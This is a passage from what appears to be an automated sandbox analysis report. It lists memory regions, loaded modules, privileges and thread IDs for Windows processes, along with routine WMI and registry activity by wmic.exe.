private_0x0000000006940000 0x06940000 0x06a3ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000006a40000 0x06a40000 0x06a63fff Pagefile Backed Memory Readable, Writable True False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x6f010000 0x6f0cefff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x6f0d0000 0x6f0e0fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x6f0f0000 0x6f1d0fff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x6f1e0000 0x6f1f3fff Memory Mapped File Readable, Writable, Executable False False False -
msoxmlmf.dll 0x6f200000 0x6f20ffff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x6f210000 0x6f22cfff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x6f230000 0x6f3bdfff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x6f3c0000 0x6f426fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x6f430000 0x6f43cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x6f440000 0x6f47efff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x6fbf0000 0x6fc64fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fdc0000 0x6ffccfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6ffd0000 0x7014dfff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71720000 0x719eafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73bf0000 0x73dacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x73db0000 0x73dbbfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x73dc0000 0x73edefff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x73ee0000 0x73f71fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x73f80000 0x73fc3fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x73fd0000 0x740bafff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x746c0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x74bc0000 0x74c4cfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x74f10000 0x74f54fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74f60000 0x74f6efff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76630000 0x766b3fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76dc0000 0x76e3afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e40000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f590000 0x7f590000 0x7f68ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f690000 0x7f690000 0x7f6b2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7df9abbfffff Private Memory Readable True False False -
pagefile_0x00007df9abc00000 0x7df9abc00000 0x7ff9abbfffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
Host Behavior
COM (5)
»
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\X2VS1CUM\ROOT\CIMV2 True 1
Fn
Registry (5)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\wbem\wmic.exe base_address = 0xc70000 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = X2VS1CUM True 1
Fn
Get Time type = Local Time, time = 2018-03-14 02:01:08 (Local Time) True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process #17: svchost.exe
0 0
»
Information Value
ID #17
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:55, Reason: RPC Server
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:28
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x330
Parent PID 0x1f4 (c:\windows\system32\services.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x F28
0x C60
0x AD4
0x 9C4
0x 9B0
0x 954
0x 940
0x 4EC
0x 8E4
0x 8CC
0x 8C8
0x 8C0
0x 8A4
0x 8B0
0x 8AC
0x 89C
0x 894
0x 888
0x 884
0x 424
0x 868
0x 82C
0x 814
0x 804
0x 768
0x 754
0x 73C
0x 4C4
0x 6E0
0x 6D8
0x 6D4
0x 648
0x 550
0x 53C
0x 54C
0x 4D4
0x 8
0x 484
0x 7F4
0x 7A8
0x 760
0x 690
0x 5FC
0x 5F0
0x 5E0
0x 58C
0x 50C
0x 470
0x 448
0x 40C
0x 1F0
0x 188
0x 19C
0x 124
0x E4
0x 3E4
0x 3E0
0x 3DC
0x 3D8
0x 3D4
0x 3D0
0x 3CC
0x 3C4
0x 3C0
0x 3BC
0x 334
0x C4C
0x 994
0x 68C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000de99780000 0xde99780000 0xde997fffff Private Memory Readable, Writable True False False -
private_0x000000de99800000 0xde99800000 0xde999fffff Private Memory Readable, Writable True False False -
private_0x000000de99b80000 0xde99b80000 0xde99c7ffff Private Memory Readable, Writable True False False -
private_0x000000de99c80000 0xde99c80000 0xde99d7ffff Private Memory Readable, Writable True False False -
private_0x000000de99d80000 0xde99d80000 0xde99e7ffff Private Memory Readable, Writable True False False -
private_0x000000de99f80000 0xde99f80000 0xde99ffffff Private Memory Readable, Writable True False False -
private_0x000000de9a000000 0xde9a000000 0xde9a0fffff Private Memory Readable, Writable True False False -
private_0x000000de9a100000 0xde9a100000 0xde9a1fffff Private Memory Readable, Writable True False False -
private_0x000000de9a200000 0xde9a200000 0xde9a27ffff Private Memory Readable, Writable True False False -
private_0x000000de9a280000 0xde9a280000 0xde9a37ffff Private Memory Readable, Writable True False False -
private_0x000000de9a380000 0xde9a380000 0xde9a3fffff Private Memory Readable, Writable True False False -
private_0x000000de9a400000 0xde9a400000 0xde9a47ffff Private Memory Readable, Writable True False False -
private_0x000000de9a480000 0xde9a480000 0xde9a57ffff Private Memory Readable, Writable True False False -
private_0x000000de9a580000 0xde9a580000 0xde9a67ffff Private Memory Readable, Writable True False False -
private_0x000000de9a680000 0xde9a680000 0xde9a77ffff Private Memory Readable, Writable True False False -
private_0x000000de9a780000 0xde9a780000 0xde9a87ffff Private Memory Readable, Writable True False False -
private_0x000000de9a880000 0xde9a880000 0xde9a97ffff Private Memory Readable, Writable True False False -
private_0x000000de9ab80000 0xde9ab80000 0xde9ac7ffff Private Memory Readable, Writable True False False -
private_0x000000de9ac80000 0xde9ac80000 0xde9acfffff Private Memory Readable, Writable True False False -
private_0x000000de9ad00000 0xde9ad00000 0xde9adfffff Private Memory Readable, Writable True False False -
private_0x000000de9ae00000 0xde9ae00000 0xde9aefffff Private Memory Readable, Writable True False False -
private_0x000000de9b000000 0xde9b000000 0xde9b07ffff Private Memory Readable, Writable True False False -
private_0x000000de9b080000 0xde9b080000 0xde9b17ffff Private Memory Readable, Writable True False False -
private_0x000000de9b280000 0xde9b280000 0xde9b2fffff Private Memory Readable, Writable True False False -
private_0x000000de9b300000 0xde9b300000 0xde9b3fffff Private Memory Readable, Writable True False False -
private_0x000000de9b400000 0xde9b400000 0xde9b4fffff Private Memory Readable, Writable True False False -
private_0x000000de9b500000 0xde9b500000 0xde9b5fffff Private Memory Readable, Writable True False False -
private_0x000000de9b600000 0xde9b600000 0xde9b67ffff Private Memory Readable, Writable True False False -
private_0x000000de9b680000 0xde9b680000 0xde9b77ffff Private Memory Readable, Writable True False False -
private_0x000000de9b880000 0xde9b880000 0xde9b97ffff Private Memory Readable, Writable True False False -
private_0x000000de9ba80000 0xde9ba80000 0xde9bb7ffff Private Memory Readable, Writable True False False -
private_0x000000de9bb80000 0xde9bb80000 0xde9bbfffff Private Memory Readable, Writable True False False -
private_0x000000de9bc00000 0xde9bc00000 0xde9bc7ffff Private Memory Readable, Writable True False False -
private_0x000000de9bc80000 0xde9bc80000 0xde9bcfffff Private Memory Readable, Writable True False False -
private_0x000000de9bd00000 0xde9bd00000 0xde9bd7ffff Private Memory Readable, Writable True False False -
private_0x000000de9bd80000 0xde9bd80000 0xde9bdfffff Private Memory Readable, Writable True False False -
private_0x000000de9be00000 0xde9be00000 0xde9be7ffff Private Memory Readable, Writable True False False -
private_0x000000de9be80000 0xde9be80000 0xde9bf7ffff Private Memory Readable, Writable True False False -
private_0x000000de9c080000 0xde9c080000 0xde9c0fffff Private Memory Readable, Writable True False False -
private_0x000000de9c100000 0xde9c100000 0xde9c17ffff Private Memory Readable, Writable True False False -
private_0x000000de9c180000 0xde9c180000 0xde9c27ffff Private Memory Readable, Writable True False False -
private_0x000000de9c280000 0xde9c280000 0xde9c2fffff Private Memory Readable, Writable True False False -
private_0x000000de9c300000 0xde9c300000 0xde9c3fffff Private Memory Readable, Writable True False False -
private_0x000000de9c400000 0xde9c400000 0xde9c47ffff Private Memory Readable, Writable True False False -
private_0x000000de9c480000 0xde9c480000 0xde9c57ffff Private Memory Readable, Writable True False False -
private_0x000000de9c580000 0xde9c580000 0xde9c67ffff Private Memory Readable, Writable True False False -
private_0x000000de9c680000 0xde9c680000 0xde9c77ffff Private Memory Readable, Writable True False False -
private_0x000000de9c780000 0xde9c780000 0xde9c87ffff Private Memory Readable, Writable True False False -
private_0x000000de9c880000 0xde9c880000 0xde9c8fffff Private Memory Readable, Writable True False False -
private_0x000000de9c900000 0xde9c900000 0xde9c97ffff Private Memory Readable, Writable True False False -
private_0x000000de9c980000 0xde9c980000 0xde9c9fffff Private Memory Readable, Writable True False False -
private_0x000000de9ca00000 0xde9ca00000 0xde9ca7ffff Private Memory Readable, Writable True False False -
private_0x000000de9cb00000 0xde9cb00000 0xde9cbfffff Private Memory Readable, Writable True False False -
private_0x000000de9cc00000 0xde9cc00000 0xde9ccfffff Private Memory Readable, Writable True False False -
private_0x000000de9cd00000 0xde9cd00000 0xde9cdfffff Private Memory Readable, Writable True False False -
private_0x000000de9ce00000 0xde9ce00000 0xde9cefffff Private Memory Readable, Writable True False False -
private_0x000000de9d100000 0xde9d100000 0xde9d1fffff Private Memory Readable, Writable True False False -
private_0x000000de9d200000 0xde9d200000 0xde9d2fffff Private Memory Readable, Writable True False False -
private_0x000000de9d300000 0xde9d300000 0xde9d3fffff Private Memory Readable, Writable True False False -
private_0x000000de9d400000 0xde9d400000 0xde9d4fffff Private Memory Readable, Writable True False False -
private_0x000000de9d500000 0xde9d500000 0xde9d5fffff Private Memory Readable, Writable True False False -
private_0x000000de9d600000 0xde9d600000 0xde9d6fffff Private Memory Readable, Writable True False False -
private_0x000000de9d700000 0xde9d700000 0xde9d7fffff Private Memory Readable, Writable True False False -
private_0x000000de9d900000 0xde9d900000 0xde9d9fffff Private Memory Readable, Writable True False False -
private_0x000000de9da00000 0xde9da00000 0xde9dafffff Private Memory Readable, Writable True False False -
private_0x000000de9dc00000 0xde9dc00000 0xde9dcfffff Private Memory Readable, Writable True False False -
private_0x000000de9de00000 0xde9de00000 0xde9de7ffff Private Memory Readable, Writable True False False -
pagefile_0x000002d8abe20000 0x2d8abe20000 0x2d8abe2ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8abe30000 0x2d8abe30000 0x2d8abe31fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8abe40000 0x2d8abe40000 0x2d8abe54fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8abe60000 0x2d8abe60000 0x2d8abe63fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8abe70000 0x2d8abe70000 0x2d8abe70fff Pagefile Backed Memory Readable True False False -
private_0x000002d8abe80000 0x2d8abe80000 0x2d8abe81fff Private Memory Readable, Writable True False False -
locale.nls 0x2d8abe90000 0x2d8abf4dfff Memory Mapped File Readable False False False -
pagefile_0x000002d8abf50000 0x2d8abf50000 0x2d8abf50fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002d8abf60000 0x2d8abf60000 0x2d8abf60fff Private Memory Readable, Writable True False False -
private_0x000002d8abf70000 0x2d8abf70000 0x2d8abf70fff Private Memory Readable, Writable True False False -
private_0x000002d8abf80000 0x2d8abf80000 0x2d8abf86fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8abf90000 0x2d8abf90000 0x2d8abf90fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8abfa0000 0x2d8abfa0000 0x2d8abfa0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8abfb0000 0x2d8abfb0000 0x2d8abfb1fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8abfc0000 0x2d8abfc0000 0x2d8abfc0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8abfd0000 0x2d8abfd0000 0x2d8abfd0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002d8abfe0000 0x2d8abfe0000 0x2d8abfe6fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8abff0000 0x2d8abff0000 0x2d8abff1fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x2d8ac000000 0x2d8ac003fff Memory Mapped File Readable True False False -
cversions.2.db 0x2d8ac010000 0x2d8ac013fff Memory Mapped File Readable True False False -
private_0x000002d8ac020000 0x2d8ac020000 0x2d8ac026fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8ac030000 0x2d8ac030000 0x2d8ac0effff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8ac0f0000 0x2d8ac0f0000 0x2d8ac0f1fff Pagefile Backed Memory Readable True False False -
private_0x000002d8ac100000 0x2d8ac100000 0x2d8ac1fffff Private Memory Readable, Writable True False False -
private_0x000002d8ac200000 0x2d8ac200000 0x2d8ac2fffff Private Memory Readable, Writable True False False -
pagefile_0x000002d8ac300000 0x2d8ac300000 0x2d8ac487fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8ac490000 0x2d8ac490000 0x2d8ac610fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002d8ac620000 0x2d8ac620000 0x2d8aca1afff Pagefile Backed Memory Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db 0x2d8aca20000 0x2d8aca64fff Memory Mapped File Readable True False False -
activeds.dll.mui 0x2d8aca70000 0x2d8aca71fff Memory Mapped File Readable False False False -
winnlsres.dll 0x2d8aca80000 0x2d8aca84fff Memory Mapped File Readable False False False -
private_0x000002d8aca90000 0x2d8aca90000 0x2d8aca96fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8acaa0000 0x2d8acaa0000 0x2d8acaa1fff Pagefile Backed Memory Readable True False False -
private_0x000002d8acab0000 0x2d8acab0000 0x2d8acab6fff Private Memory Readable, Writable True False False -
newdev.dll.mui 0x2d8acac0000 0x2d8acac6fff Memory Mapped File Readable False False False -
private_0x000002d8acad0000 0x2d8acad0000 0x2d8acad0fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8acae0000 0x2d8acae0000 0x2d8acae0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002d8acaf0000 0x2d8acaf0000 0x2d8acaf6fff Private Memory Readable, Writable True False False -
private_0x000002d8acb00000 0x2d8acb00000 0x2d8acbfffff Private Memory Readable, Writable True False False -
private_0x000002d8acc00000 0x2d8acc00000 0x2d8accfffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2d8acd00000 0x2d8ad036fff Memory Mapped File Readable False False False -
private_0x000002d8ad040000 0x2d8ad040000 0x2d8ad13ffff Private Memory Readable, Writable True False False -
private_0x000002d8ad140000 0x2d8ad140000 0x2d8ad182fff Private Memory Readable, Writable True False False -
private_0x000002d8ad190000 0x2d8ad190000 0x2d8ad193fff Private Memory Readable, Writable True False False -
private_0x000002d8ad1a0000 0x2d8ad1a0000 0x2d8ad1a6fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8ad1b0000 0x2d8ad1b0000 0x2d8ad1fdfff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002d8ad200000 0x2d8ad200000 0x2d8ad2fffff Private Memory Readable, Writable True False False -
private_0x000002d8ad300000 0x2d8ad300000 0x2d8ad3fffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x2d8ad400000 0x2d8ad4dffff Memory Mapped File Readable False False False -
private_0x000002d8ad4e0000 0x2d8ad4e0000 0x2d8ad4effff Private Memory Readable, Writable True False False -
private_0x000002d8ad4f0000 0x2d8ad4f0000 0x2d8ad4fffff Private Memory Readable, Writable True False False -
private_0x000002d8ad500000 0x2d8ad500000 0x2d8ad5fffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db 0x2d8ad600000 0x2d8ad68dfff Memory Mapped File Readable True False False -
pagefile_0x000002d8ad690000 0x2d8ad690000 0x2d8ad78ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad790000 0x2d8ad790000 0x2d8ad79ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad7a0000 0x2d8ad7a0000 0x2d8ad7affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad7b0000 0x2d8ad7b0000 0x2d8ad7bffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad7c0000 0x2d8ad7c0000 0x2d8ad7cffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad7d0000 0x2d8ad7d0000 0x2d8ad7dffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad7e0000 0x2d8ad7e0000 0x2d8ad7effff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002d8ad7f0000 0x2d8ad7f0000 0x2d8ad7f0fff Private Memory Readable, Writable True False False -
private_0x000002d8ad800000 0x2d8ad800000 0x2d8ad806fff Private Memory Readable, Writable True False False -
private_0x000002d8ad810000 0x2d8ad810000 0x2d8ad85dfff Private Memory Readable, Writable True False False -
private_0x000002d8ad860000 0x2d8ad860000 0x2d8ad860fff Private Memory Readable, Writable True False False -
private_0x000002d8ad870000 0x2d8ad870000 0x2d8ad873fff Private Memory Readable, Writable True False False -
private_0x000002d8ad880000 0x2d8ad880000 0x2d8ad886fff Private Memory Readable, Writable True False False -
pagefile_0x000002d8ad890000 0x2d8ad890000 0x2d8ad89ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad8a0000 0x2d8ad8a0000 0x2d8ad8affff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad8b0000 0x2d8ad8b0000 0x2d8ad8bffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad8c0000 0x2d8ad8c0000 0x2d8ad8cffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad8d0000 0x2d8ad8d0000 0x2d8ad8dffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002d8ad8e0000 0x2d8ad8e0000 0x2d8ad8effff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002d8ad8f0000 0x2d8ad8f0000 0x2d8ad8f1fff Private Memory Readable, Writable True False False -
private_0x000002d8ad900000 0x2d8ad900000 0x2d8ad9fffff Private Memory Readable, Writable True False False -
private_0x000002d8ada00000 0x2d8ada00000 0x2d8adafffff Private Memory Readable, Writable True False False -
private_0x000002d8adb00000 0x2d8adb00000 0x2d8adbfffff Private Memory Readable, Writable True False False -
private_0x000002d8adc00000 0x2d8adc00000 0x2d8adcfffff Private Memory Readable, Writable True False False -
private_0x000002d8add00000 0x2d8add00000 0x2d8addfffff Private Memory Readable, Writable True False False -
private_0x000002d8ade00000 0x2d8ade00000 0x2d8adefffff Private Memory Readable, Writable True False False -
private_0x000002d8adf00000 0x2d8adf00000 0x2d8aeefffff Private Memory Readable, Writable True False False -
private_0x000002d8aef00000 0x2d8aef00000 0x2d8aef00fff Private Memory Readable, Writable True False False -
private_0x000002d8aef10000 0x2d8aef10000 0x2d8aef2ffff Private Memory Readable, Writable True False False -
For performance reasons, the remaining 423 entries are omitted.
The remaining entries can be found in flog.txt.
Process #18: wmiprvse.exe
0 0
»
Information Value
ID #18
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:56, Reason: RPC Server
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:27
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xc50
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x C48
0x C44
0x 688
0x A1C
0x A54
0x C64
0x 708
0x 704
0x 6EC
0x 710
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000f88a400000 0xf88a400000 0xf88a5fffff Private Memory Readable, Writable True False False -
private_0x000000f88a600000 0xf88a600000 0xf88a67ffff Private Memory Readable, Writable True False False -
private_0x000000f88a680000 0xf88a680000 0xf88a6fffff Private Memory Readable, Writable True False False -
private_0x000000f88a700000 0xf88a700000 0xf88a77ffff Private Memory Readable, Writable True False False -
private_0x000000f88a780000 0xf88a780000 0xf88a7fffff Private Memory Readable, Writable True False False -
private_0x000000f88a800000 0xf88a800000 0xf88a87ffff Private Memory Readable, Writable True False False -
private_0x000000f88a880000 0xf88a880000 0xf88a8fffff Private Memory Readable, Writable True False False -
private_0x000000f88a900000 0xf88a900000 0xf88a97ffff Private Memory Readable, Writable True False False -
private_0x000000f88a980000 0xf88a980000 0xf88a9fffff Private Memory Readable, Writable True False False -
private_0x000000f88aa00000 0xf88aa00000 0xf88aa7ffff Private Memory Readable, Writable True False False -
private_0x000002883af80000 0x2883af80000 0x2883af9ffff Private Memory Readable, Writable True False False -
pagefile_0x000002883af80000 0x2883af80000 0x2883af8ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002883af90000 0x2883af90000 0x2883af96fff Private Memory Readable, Writable True False False -
pagefile_0x000002883afa0000 0x2883afa0000 0x2883afb4fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883afc0000 0x2883afc0000 0x2883afc3fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883afd0000 0x2883afd0000 0x2883afd0fff Pagefile Backed Memory Readable True False False -
private_0x000002883afe0000 0x2883afe0000 0x2883afe1fff Private Memory Readable, Writable True False False -
private_0x000002883aff0000 0x2883aff0000 0x2883aff6fff Private Memory Readable, Writable True False False -
private_0x000002883b000000 0x2883b000000 0x2883b000fff Private Memory Readable, Writable True False False -
private_0x000002883b010000 0x2883b010000 0x2883b010fff Private Memory Readable, Writable True False False -
pagefile_0x000002883b020000 0x2883b020000 0x2883b021fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883b030000 0x2883b030000 0x2883b030fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002883b040000 0x2883b040000 0x2883b040fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000002883b050000 0x2883b050000 0x2883b050fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883b060000 0x2883b060000 0x2883b060fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883b070000 0x2883b070000 0x2883b071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000002883b0a0000 0x2883b0a0000 0x2883b19ffff Private Memory Readable, Writable True False False -
locale.nls 0x2883b1a0000 0x2883b25dfff Memory Mapped File Readable False False False -
pagefile_0x000002883b260000 0x2883b260000 0x2883b3e7fff Pagefile Backed Memory Readable True False False -
private_0x000002883b440000 0x2883b440000 0x2883b44ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x2883b450000 0x2883b786fff Memory Mapped File Readable False False False -
pagefile_0x000002883b790000 0x2883b790000 0x2883b910fff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883b920000 0x2883b920000 0x2883b9dffff Pagefile Backed Memory Readable True False False -
pagefile_0x000002883b9e0000 0x2883b9e0000 0x2883ba6bfff Pagefile Backed Memory Readable True False False -
private_0x000002883ba70000 0x2883ba70000 0x2883bb6ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ff360000 0x7df5ff360000 0x7ff5ff35ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff738600000 0x7ff738600000 0x7ff7386fffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff738700000 0x7ff738700000 0x7ff738722fff Pagefile Backed Memory Readable True False False -
wmiprvse.exe 0x7ff738a80000 0x7ff738afffff Memory Mapped File Readable, Writable, Executable False False False -
cimwin32.dll 0x7ff990570000 0x7ff99073efff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ff9908e0000 0x7ff99092dfff Memory Mapped File Readable, Writable, Executable False False False -
ncobjapi.dll 0x7ff998aa0000 0x7ff998ab5fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ff998f00000 0x7ff998f24fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ff998f30000 0x7ff998f43fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ff998f50000 0x7ff999045fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ff999b70000 0x7ff999b80fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ff99b440000 0x7ff99b4befff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x7ff9a7980000 0x7ff9a799efff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ff9a7ea0000 0x7ff9a7eccfff Memory Mapped File Readable, Writable, Executable False False False -
